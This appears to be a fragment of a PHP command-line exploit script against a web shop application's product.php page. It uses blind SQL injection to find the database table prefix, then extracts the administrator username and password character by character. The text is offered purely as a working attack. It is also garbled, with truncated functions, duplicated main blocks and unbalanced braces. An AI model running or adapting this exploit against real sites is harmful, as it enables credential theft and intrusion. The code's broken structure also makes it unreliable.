{
echo "[+] username length: ";
$exit = 0;
$length = 0;
$pos = 1;
$chr = 0;
while ($exit == 0) {
$response = exploit($hostname, $path, $pos, $chr, $chs, $goodid);
if (preg_match("/javascript:addToCart/i", $response)) {
$exit = 1;
$length = $pos;
break;
} else {
$pos++;
if ($pos > 20) {
exit("Exploit failed");
}
}
}
echo $length . "\n";
return $length;
}
if ($argc != 4) {
usage();
}
$hostname = $argv[1];
$path = $argv[2];
$goodid = $argv[3];
$length = lengthcolumns($hostname, $path, 3, $goodid);
crkusername($hostname, $path, 1, $goodid);
crkpassword($hostname, $path, 2, $goodid);
$conn = fsockopen($hostname, 80);
$request = "GET {$path}/product.php?q=&action=searchlist&where=%23 HTTP/1.1\r\n";
$request .= "Host: {$hostname}\r\n";
$request .= "Connection: Close\r\n\r\n";
fputs($conn, $request);
while (!feof($conn)) {
$reply .= fgets($conn, 1024);
}
fclose($conn);
preg_match('/FROM `(.+)yp_product/ie', $reply, $match);
if ($match[1]) {
return $match[1];
} else {
return false;
}
}
if ($argc != 3) {
usage();
}
$prefix = "";
$hostname = $argv[1];
$path = $argv[2];
$prefix = getprefix($hostname, $path);
if ($prefix) {
echo $prefix . "\r\n";
$length = lengthcolumns($hostname, $path, 3);
crkusername($hostname, $path, 1);
crkpassword($hostname, $path, 2);
} else {
exit("Exploit failed");
}